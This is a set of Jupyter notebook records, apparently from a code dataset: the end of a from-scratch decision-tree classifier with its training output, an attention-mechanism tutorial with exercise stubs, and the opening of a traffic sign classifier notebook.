=\",self.__entropy(Y))\n print(\"Splitting on feature X[\",final_feature,\"] with gain ratio \",max_gain,sep=\"\")\n print()\n elif metric == \"gini_index\":\n print(\"Current Gini Index is =\",self.__gini_index(Y))\n print(\"Splitting on feature X[\",final_feature,\"] with gini gain \",max_gain,sep=\"\")\n print()\n\n \n unique_values = set(X[:,final_feature]) # unique_values represents the unique values of the feature selected\n df = pd.DataFrame(X)\n # Adding Y values as the last column in the dataframe\n df[df.shape[1]] = Y\n\n current_node = TreeNode(final_feature,output)\n\n # Now removing the selected feature from the list as we do not want to split on one feature more than once(in a given root to leaf node path)\n index = features.index(final_feature)\n features.remove(final_feature)\n for i in unique_values:\n # Creating a new dataframe with value of selected feature = i\n df1 = df[df[final_feature] == i]\n # Segregating the X and Y values and recursively calling on the splits\n node = self.__decision_tree(df1.iloc[:,0:df1.shape[1]-1].values,df1.iloc[:,df1.shape[1]-1].values,features,level+1,metric,classes)\n current_node.add_child(i,node)\n\n # Add the removed feature \n features.insert(index,final_feature)\n\n return current_node\n \n def fit(self,X,Y,metric=\"gain_ratio\"):\n # Fits to the given training data\n # metric can take value gain_ratio or gini_index\n features = [i for i in range(len(X[0]))]\n classes = set(Y)\n level = 0\n if metric != \"gain_ratio\" :\n if metric != \"gini_index\":\n metric=\"gain_ratio\" # if user entered a value which was neither gini_index nor gain_ratio\n self.__root = self.__decision_tree(X,Y,features,level,metric,classes)\n \n def __predict_for(self,data,node):\n # predicts the class for a given testing point and returns the answer\n \n # We have reached a leaf node\n if len(node.children) == 0 :\n return node.output\n\n val = data[node.data] # represents the value of feature on which the split was made \n if val not in node.children :\n return node.output\n \n # Recursively call on the splits\n return self.__predict_for(data,node.children[val])\n\n def predict(self,X):\n # This function returns Y predicted\n # X should be a 2-D np array\n Y = np.array([0 for i in range(len(X))])\n for i in range(len(X)):\n Y[i] = self.__predict_for(X[i],self.__root)\n return Y\n \n def score(self,X,Y):\n # returns the 
mean accuracy\n Y_pred = self.predict(X)\n count = 0\n for i in range(len(Y_pred)):\n if Y_pred[i] == Y[i]:\n count+=1\n return count/len(Y_pred)\n \n def export_tree_pdf(self,filename=None):\n # returns the tree as dot data\n # if filename is specified the function \n # will save the pdf file in current directory which consists of the visual reresentation of the tree\n import pydotplus\n from collections import deque\n \n dot_data = '''digraph Tree {\nnode [shape=box] ;'''\n \n queue = deque()\n \n r = self.__root\n queue.append(r)\n count = 0\n if r.index == -1:\n r.index = count\n \n dot_data = dot_data + \"\\n{} [label=\\\"Feature to split upon : X[{}]\\\\nOutput at this node : {}\\\" ];\".format(count,r.data,r.output) \n \n # Doing LEVEL ORDER traversal in the tree (using a queue)\n while len(queue) != 0 :\n node = queue.popleft()\n for i in node.children:\n count+=1\n if(node.children[i].index==-1):\n node.children[i].index = count\n \n # Creating child node\n dot_data = dot_data + \"\\n{} [label=\\\"Feature to split upon : X[{}]\\\\nOutput at this node : {}\\\" ];\".format(node.children[i].index,node.children[i].data,node.children[i].output) \n # Connecting parent node with child\n dot_data = dot_data + \"\\n{} -> {} [ headlabel=\\\"Feature value = {}\\\"]; \".format(node.index,node.children[i].index,i)\n # Adding child node to queue\n queue.append(node.children[i])\n \n dot_data = dot_data + \"\\n}\"\n\n if filename != None: \n graph = pydotplus.graph_from_dot_data(dot_data)\n graph.write_pdf(filename) \n \n return dot_data",
"_____no_output_____"
],
[
"import math\nimport pandas as pd\nimport numpy as np\nclf = DecisionTreeClassifier()\nclf.fit(x_train,y_train,metric='gini_index')\nY_pred = clf.predict(x_test)\nprint(\"Predictions : \",Y_pred)\nprint()\nour_score = clf.score(x_train,y_train)\nprint(\"Score :\",our_score) # score on training data\nprint()\nprint(\"DOT DATA :-\",clf.export_tree_pdf(filename=\"tree_sample_dataset.pdf\"))",
"Level 0\nCount of 0 = 39\nCount of 1 = 35\nCount of 2 = 38\nCurrent Gini Index is = 0.6659757653061225\nSplitting on feature X[3] with gini gain 0.613035649866007\n\nLevel 1\nCount of 0 = 22\nCount of 1 = 0\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 1\nCurrent Gini Index is = 0.5\nSplitting on feature X[0] with gini gain 0.5\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 1\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 2\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 10\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 3\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 1\nCount of 1 = 0\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 7\nCount of 2 = 2\nCurrent Gini Index is = 0.345679012345679\nSplitting on feature X[0] with gini gain 0.345679012345679\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 1\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 1\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 5\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 4\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 2\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 6\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 7\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 2\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 1\nCount of 1 = 0\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 4\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 2\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 5\nCount of 1 = 0\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 6\nCount of 1 = 0\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 10\nCurrent Gini Index is = 
0.1652892561983472\nSplitting on feature X[1] with gini gain 0.1652892561983472\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 1\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 4\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 2\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 1\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 1\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 1\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 3\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 4\nCount of 1 = 0\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nPredictions : [2 2 1 1 2 1 1 1 1 2 2 0 0 1 1 1 2 0 2 0 1 1 0 1 1 1 0 0 2 2 0 0 2 1 1 0 0\n 2]\n\nScore : 1.0\n\nDOT DATA :- digraph Tree {\nnode [shape=box] ;\n0 [label=\"Feature to split upon : X[3]\\nOutput at this node : 0\" ];\n1 [label=\"Feature to split upon : X[None]\\nOutput at this node : 0\" ];\n0 -> 1 [ headlabel=\"Feature value = 0.2\"]; \n2 [label=\"Feature to split upon : X[0]\\nOutput at this node : 1\" ];\n0 -> 2 [ headlabel=\"Feature value = 1.7\"]; \n3 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n0 -> 3 [ headlabel=\"Feature value = 2.4\"]; \n4 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n0 -> 4 [ headlabel=\"Feature value = 1.3\"]; \n5 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n0 -> 5 [ headlabel=\"Feature value = 1.6\"]; \n6 [label=\"Feature to split upon : X[None]\\nOutput at this node : 0\" ];\n0 -> 6 [ headlabel=\"Feature value = 0.5\"]; \n7 [label=\"Feature to split upon : X[0]\\nOutput at this node : 1\" ];\n0 -> 7 [ headlabel=\"Feature value = 1.5\"]; \n8 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n0 -> 8 [ headlabel=\"Feature value = 2.0\"]; \n9 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n0 -> 9 [ headlabel=\"Feature value = 1.4\"]; \n10 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n0 -> 10 [ headlabel=\"Feature value = 2.2\"]; \n11 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n0 -> 11 [ headlabel=\"Feature value = 1.0\"]; \n12 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n0 -> 12 [ headlabel=\"Feature value = 2.3\"]; \n13 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n0 -> 13 [ headlabel=\"Feature value = 2.5\"]; \n14 [label=\"Feature to split upon : X[None]\\nOutput at this node : 0\" ];\n0 -> 14 [ headlabel=\"Feature value = 0.6\"]; \n15 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n0 -> 15 [ headlabel=\"Feature value = 1.1\"]; \n16 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n0 -> 16 [ headlabel=\"Feature value = 2.1\"]; \n17 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n0 -> 17 [ headlabel=\"Feature value = 1.2\"]; \n18 [label=\"Feature to split upon : X[None]\\nOutput at this node : 0\" ];\n0 -> 18 [ headlabel=\"Feature value = 0.1\"]; \n19 [label=\"Feature to split upon : X[None]\\nOutput at this node : 
0\" ];\n0 -> 19 [ headlabel=\"Feature value = 0.3\"]; \n20 [label=\"Feature to split upon : X[1]\\nOutput at this node : 2\" ];\n0 -> 20 [ headlabel=\"Feature value = 1.8\"]; \n21 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n0 -> 21 [ headlabel=\"Feature value = 1.9\"]; \n22 [label=\"Feature to split upon : X[None]\\nOutput at this node : 0\" ];\n0 -> 22 [ headlabel=\"Feature value = 0.4\"]; \n23 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n2 -> 23 [ headlabel=\"Feature value = 4.9\"]; \n24 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n2 -> 24 [ headlabel=\"Feature value = 6.7\"]; \n25 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n7 -> 25 [ headlabel=\"Feature value = 5.6\"]; \n26 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n7 -> 26 [ headlabel=\"Feature value = 5.4\"]; \n27 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n7 -> 27 [ headlabel=\"Feature value = 5.9\"]; \n28 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n7 -> 28 [ headlabel=\"Feature value = 6.4\"]; \n29 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n7 -> 29 [ headlabel=\"Feature value = 6.9\"]; \n30 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n7 -> 30 [ headlabel=\"Feature value = 6.7\"]; \n31 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n7 -> 31 [ headlabel=\"Feature value = 6.3\"]; \n32 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n7 -> 32 [ headlabel=\"Feature value = 6.5\"]; \n33 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n7 -> 33 [ headlabel=\"Feature value = 6.0\"]; \n34 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n20 -> 34 [ headlabel=\"Feature value = 2.7\"]; \n35 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n20 -> 35 [ headlabel=\"Feature value = 3.0\"]; \n36 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n20 -> 36 [ headlabel=\"Feature value = 2.9\"]; \n37 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n20 -> 37 [ headlabel=\"Feature value = 3.2\"]; \n38 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n20 -> 38 [ headlabel=\"Feature value = 2.8\"]; \n39 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n20 -> 39 [ headlabel=\"Feature value = 3.1\"]; \n40 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n20 -> 40 [ headlabel=\"Feature value = 2.5\"]; \n}\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code"
]
] |
e706dbda847d8ef2159713f49b2c40f68b78f1a1 | 9,198 | ipynb | Jupyter Notebook | attention/Attention_Basics.ipynb | prokokok/deep-learning-v2-pytorch | 5f04298aab7d51873b59e8720122def5673f1815 | [
"MIT"
] | null | null | null | attention/Attention_Basics.ipynb | prokokok/deep-learning-v2-pytorch | 5f04298aab7d51873b59e8720122def5673f1815 | [
"MIT"
] | null | null | null | attention/Attention_Basics.ipynb | prokokok/deep-learning-v2-pytorch | 5f04298aab7d51873b59e8720122def5673f1815 | [
"MIT"
] | null | null | null | 31.285714 | 335 | 0.624375 | [
[
[
"# Attention Basics\nIn this notebook, we look at how attention is implemented. We will focus on implementing attention in isolation from a larger model. That's because when implementing attention in a real-world model, a lot of the focus goes into piping the data and juggling the various vectors rather than the concepts of attention themselves.\n\nWe will implement attention scoring as well as calculating an attention context vector.\n\n## Attention Scoring\n### Inputs to the scoring function\nLet's start by looking at the inputs we'll give to the scoring function. We will assume we're in the first step in the decoding phase. The first input to the scoring function is the hidden state of decoder (assuming a toy RNN with three hidden nodes -- not usable in real life, but easier to illustrate):",
"_____no_output_____"
]
],
[
[
"dec_hidden_state = [5,1,20]",
"_____no_output_____"
]
],
[
[
"Let's visualize this vector:",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Let's visualize our decoder hidden state\nplt.figure(figsize=(1.5, 4.5))\nsns.heatmap(np.transpose(np.matrix(dec_hidden_state)), annot=True, cmap=sns.light_palette(\"purple\", as_cmap=True), linewidths=1)",
"_____no_output_____"
]
],
[
[
"Our first scoring function will score a single annotation (encoder hidden state), which looks like this:",
"_____no_output_____"
]
],
[
[
"annotation = [3,12,45] #e.g. Encoder hidden state",
"_____no_output_____"
],
[
"# Let's visualize the single annotation\nplt.figure(figsize=(1.5, 4.5))\nsns.heatmap(np.transpose(np.matrix(annotation)), annot=True, cmap=sns.light_palette(\"orange\", as_cmap=True), linewidths=1)",
"_____no_output_____"
]
],
[
[
"### IMPLEMENT: Scoring a Single Annotation\nLet's calculate the dot product of a single annotation. NumPy's [dot()](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html) is a good candidate for this operation",
"_____no_output_____"
]
],
[
[
"def single_dot_attention_score(dec_hidden_state, enc_hidden_state):\n # TODO: return the dot product of the two vectors\n return \n \nsingle_dot_attention_score(dec_hidden_state, annotation)",
"_____no_output_____"
]
],
[
[
"\n### Annotations Matrix\nLet's now look at scoring all the annotations at once. To do that, here's our annotation matrix:",
"_____no_output_____"
]
],
[
[
"annotations = np.transpose([[3,12,45], [59,2,5], [1,43,5], [4,3,45.3]])",
"_____no_output_____"
]
],
[
[
"And it can be visualized like this (each column is a hidden state of an encoder time step):",
"_____no_output_____"
]
],
[
[
"# Let's visualize our annotation (each column is an annotation)\nax = sns.heatmap(annotations, annot=True, cmap=sns.light_palette(\"orange\", as_cmap=True), linewidths=1)",
"_____no_output_____"
]
],
[
[
"### IMPLEMENT: Scoring All Annotations at Once\nLet's calculate the scores of all the annotations in one step using matrix multiplication. Let's continue to us the dot scoring method\n\n<img src=\"images/scoring_functions.png\" />\n\nTo do that, we'll have to transpose `dec_hidden_state` and [matrix multiply](https://docs.scipy.org/doc/numpy/reference/generated/numpy.matmul.html) it with `annotations`.",
"_____no_output_____"
]
],
[
[
"def dot_attention_score(dec_hidden_state, annotations):\n # TODO: return the product of dec_hidden_state transpose and enc_hidden_states\n return \n \nattention_weights_raw = dot_attention_score(dec_hidden_state, annotations)\nattention_weights_raw",
"_____no_output_____"
]
],
[
[
"Looking at these scores, can you guess which of the four vectors will get the most attention from the decoder at this time step?\n\n## Softmax\nNow that we have our scores, let's apply softmax:\n<img src=\"images/softmax.png\" />",
"_____no_output_____"
]
],
[
[
"def softmax(x):\n x = np.array(x, dtype=np.float128)\n e_x = np.exp(x)\n return e_x / e_x.sum(axis=0) \n\nattention_weights = softmax(attention_weights_raw)\nattention_weights",
"_____no_output_____"
]
],
[
[
"Even when knowing which annotation will get the most focus, it's interesting to see how drastic softmax makes the end score become. The first and last annotation had the respective scores of 927 and 929. But after softmax, the attention they'll get is 0.12 and 0.88 respectively.\n\n# Applying the scores back on the annotations\nNow that we have our scores, let's multiply each annotation by its score to proceed closer to the attention context vector. This is the multiplication part of this formula (we'll tackle the summation part in the latter cells)\n\n<img src=\"images/Context_vector.png\" />",
"_____no_output_____"
]
],
[
[
"def apply_attention_scores(attention_weights, annotations):\n # TODO: Multiple the annotations by their weights\n return\n\napplied_attention = apply_attention_scores(attention_weights, annotations)\napplied_attention",
"_____no_output_____"
]
],
[
[
"Let's visualize how the context vector looks now that we've applied the attention scores back on it:",
"_____no_output_____"
]
],
[
[
"# Let's visualize our annotations after applying attention to them\nax = sns.heatmap(applied_attention, annot=True, cmap=sns.light_palette(\"orange\", as_cmap=True), linewidths=1)",
"_____no_output_____"
]
],
[
[
"Contrast this with the raw annotations visualized earlier in the notebook, and we can see that the second and third annotations (columns) have been nearly wiped out. The first annotation maintains some of its value, and the fourth annotation is the most pronounced.\n\n# Calculating the Attention Context Vector\nAll that remains to produce our attention context vector now is to sum up the four columns to produce a single attention context vector\n",
"_____no_output_____"
]
],
[
[
"def calculate_attention_vector(applied_attention):\n return np.sum(applied_attention, axis=1)\n\nattention_vector = calculate_attention_vector(applied_attention)\nattention_vector",
"_____no_output_____"
],
[
"# Let's visualize the attention context vector\nplt.figure(figsize=(1.5, 4.5))\nsns.heatmap(np.transpose(np.matrix(attention_vector)), annot=True, cmap=sns.light_palette(\"Blue\", as_cmap=True), linewidths=1)",
"_____no_output_____"
]
],
[
[
"Now that we have the context vector, we can concatenate it with the hidden state and pass it through a hidden layer to produce the the result of this decoding time step.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
]
] |
e706dc46496918b6c87c5b5bab2f226e953e6b7c | 528,336 | ipynb | Jupyter Notebook | Traffic_Sign_Classifier.ipynb | Sitesh-Kumar-Singh/TrafficSignClassifier | 5913a9434bb4cab20dae3114c827ea6f0e36a4d7 | [
"MIT"
] | null | null | null | Traffic_Sign_Classifier.ipynb | Sitesh-Kumar-Singh/TrafficSignClassifier | 5913a9434bb4cab20dae3114c827ea6f0e36a4d7 | [
"MIT"
] | null | null | null | Traffic_Sign_Classifier.ipynb | Sitesh-Kumar-Singh/TrafficSignClassifier | 5913a9434bb4cab20dae3114c827ea6f0e36a4d7 | [
"MIT"
] | null | null | null | 475.122302 | 135,436 | 0.934636 | [
[
[
"# Self-Driving Car Engineer Nanodegree\n\n## Deep Learning\n\n## Project: Build a Traffic Sign Recognition Classifier\n\nIn this notebook, a template is provided for you to implement your functionality in stages, which is required to successfully complete this project. If additional code is required that cannot be included in the notebook, be sure that the Python code is successfully imported and included in your submission if necessary. \n\n> **Note**: Once you have completed all of the code implementations, you need to finalize your work by exporting the iPython Notebook as an HTML document. Before exporting the notebook to html, all of the code cells need to have been run so that reviewers can see the final implementation and output. You can then export the notebook by using the menu above and navigating to \\n\",\n \"**File -> Download as -> HTML (.html)**. Include the finished document along with this notebook as your submission. \n\nIn addition to implementing code, there is a writeup to complete. The writeup should be completed in a separate file, which can be either a markdown file or a pdf document. There is a [write up template](https://github.com/udacity/CarND-Traffic-Sign-Classifier-Project/blob/master/writeup_template.md) that can be used to guide the writing process. Completing the code template and writeup template will cover all of the [rubric points](https://review.udacity.com/#!/rubrics/481/view) for this project.\n\nThe [rubric](https://review.udacity.com/#!/rubrics/481/view) contains \"Stand Out Suggestions\" for enhancing the project beyond the minimum requirements. The stand out suggestions are optional. If you decide to pursue the \"stand out suggestions\", you can include the code in this Ipython notebook and also discuss the results in the writeup file.\n\n\n>**Note:** Code and Markdown cells can be executed using the **Shift + Enter** keyboard shortcut. In addition, Markdown cells can be edited by typically double-clicking the cell to enter edit mode.",
"_____no_output_____"
],
[
"---\n## Step 0: Load The Data",
"_____no_output_____"
]
],
[
[
"# Load pickled data\nimport pickle\n\n# TODO: Fill this in based on where you saved the training and testing data\n\ntraining_file = '/home/workspace/data/train.p'\nvalidation_file='/home/workspace/data/valid.p'\ntesting_file = '/home/workspace/data/test.p'\n\nwith open(training_file, mode='rb') as f:\n train = pickle.load(f)\nwith open(validation_file, mode='rb') as f:\n valid = pickle.load(f)\nwith open(testing_file, mode='rb') as f:\n test = pickle.load(f)\n \nX_train, y_train = train['features'], train['labels']\nX_valid, y_valid = valid['features'], valid['labels']\nX_test, y_test = test['features'], test['labels']",
"_____no_output_____"
]
],
[
[
"---\n\n## Step 1: Dataset Summary & Exploration\n\nThe pickled data is a dictionary with 4 key/value pairs:\n\n- `'features'` is a 4D array containing raw pixel data of the traffic sign images, (num examples, width, height, channels).\n- `'labels'` is a 1D array containing the label/class id of the traffic sign. The file `signnames.csv` contains id -> name mappings for each id.\n- `'sizes'` is a list containing tuples, (width, height) representing the original width and height the image.\n- `'coords'` is a list containing tuples, (x1, y1, x2, y2) representing coordinates of a bounding box around the sign in the image. **THESE COORDINATES ASSUME THE ORIGINAL IMAGE. THE PICKLED DATA CONTAINS RESIZED VERSIONS (32 by 32) OF THESE IMAGES**\n\nComplete the basic data summary below. Use python, numpy and/or pandas methods to calculate the data summary rather than hard coding the results. For example, the [pandas shape method](http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.shape.html) might be useful for calculating some of the summary results. ",
"_____no_output_____"
],
[
"### Provide a Basic Summary of the Data Set Using Python, Numpy and/or Pandas",
"_____no_output_____"
]
],
[
[
"### Replace each question mark with the appropriate value. \n### Use python, pandas or numpy methods rather than hard coding the results\nimport numpy as np\n# TODO: Number of training examples\nn_train = X_train.shape[0]\n\n# TODO: Number of validation examples\nn_validation = X_valid.shape[0]\n\n# TODO: Number of testing examples.\nn_test = X_test.shape[0]\n\n# TODO: What's the shape of an traffic sign image?\nimage_shape = X_train.shape[1:]\n\n# TODO: How many unique classes/labels there are in the dataset.\nn_classes = len(np.unique(y_train))\n\nprint(\"Number of training examples =\", n_train)\nprint(\"Number of testing examples =\", n_test)\nprint(\"Number of validation examples =\", n_validation)\nprint(\"Image data shape =\", image_shape)\nprint(\"Number of classes =\", n_classes)",
"Number of training examples = 34799\nNumber of testing examples = 12630\nNumber of validation examples = 4410\nImage data shape = (32, 32, 3)\nNumber of classes = 43\n"
]
],
[
[
"### Include an exploratory visualization of the dataset",
"_____no_output_____"
],
[
"Visualize the German Traffic Signs Dataset using the pickled file(s). This is open ended, suggestions include: plotting traffic sign images, plotting the count of each sign, etc. \n\nThe [Matplotlib](http://matplotlib.org/) [examples](http://matplotlib.org/examples/index.html) and [gallery](http://matplotlib.org/gallery.html) pages are a great resource for doing visualizations in Python.\n\n**NOTE:** It's recommended you start with something simple first. If you wish to do more, come back to it after you've completed the rest of the sections. It can be interesting to look at the distribution of classes in the training, validation and test set. Is the distribution the same? Are there more examples of some classes than others?",
"_____no_output_____"
]
],
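[
[
"Before plotting, a quick numeric check can answer the distribution question directly. A small sketch (it reuses `y_train`, `y_valid`, `y_test` and `n_classes` from the cells above):\n\n```\nfor name, labels in [('train', y_train), ('valid', y_valid), ('test', y_test)]:\n    frac = np.bincount(labels, minlength=n_classes) / len(labels)\n    print(name, 'class share min/max: {:.3f} / {:.3f}'.format(frac.min(), frac.max()))\n```",
"_____no_output_____"
]
],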
[
[
"### Data exploration visualization code goes here.\n### Feel free to use as many code cells as needed.\nimport matplotlib.pyplot as plt\n# Visualizations will be shown in the notebook.\n%matplotlib inline\n",
"_____no_output_____"
],
[
"#Bar Graph\nimport pandas as pd\nimport seaborn as sns\nfrom collections import Counter\nsignnames = pd.read_csv('signnames.csv')\nsignnames.set_index('ClassId',inplace=True)\ndef get_name_from_label(label):\n # Helper, transofrm a numeric label into the corresponding strring\n return signnames.loc[label].SignName\n",
"_____no_output_____"
],
[
"counter = Counter(y_train)\ncounts = pd.DataFrame(columns=['sign_label','training_samples_count'],data=[(label, count) for label, count in counter.items()])\ncounts['sign'] = counts.sign_label.apply(get_name_from_label)\nplt.figure(figsize=(12,12))\nsns.set(font_scale=1.3)\nsns.barplot(x='training_samples_count',y='sign',data=counts,orient='h')\nplt.xticks(rotation=90)\nplt.ylabel('Sign Name')\nplt.xlabel('Number of samples on each category');\nplt.tight_layout()\nplt.savefig('write_up_data/train_number_of_samples_on_each_category.png')",
"_____no_output_____"
],
[
"counter = Counter(y_valid)\ncounts = pd.DataFrame(columns=['sign_label','training_samples_count'],data=[(label, count) for label, count in counter.items()])\ncounts['sign'] = counts.sign_label.apply(get_name_from_label)\nplt.figure(figsize=(12,12))\nsns.set(font_scale=1.3)\nsns.barplot(x='training_samples_count',y='sign',data=counts,orient='h')\nplt.xticks(rotation=90)\nplt.ylabel('Sign Name')\nplt.xlabel('Number of samples on each category');\nplt.tight_layout()\nplt.savefig('write_up_data/validate_number_of_samples_on_each_category.png')",
"_____no_output_____"
],
[
"counter = Counter(y_test)\ncounts = pd.DataFrame(columns=['sign_label','training_samples_count'],data=[(label, count) for label, count in counter.items()])\ncounts['sign'] = counts.sign_label.apply(get_name_from_label)\nplt.figure(figsize=(12,12))\nsns.set(font_scale=1.3)\nsns.barplot(x='training_samples_count',y='sign',data=counts,orient='h')\nplt.xticks(rotation=90)\nplt.ylabel('Sign Name')\nplt.xlabel('Number of samples on each category');\nplt.tight_layout()\nplt.savefig('write_up_data/test_number_of_samples_on_each_category.png')",
"_____no_output_____"
]
],
[
[
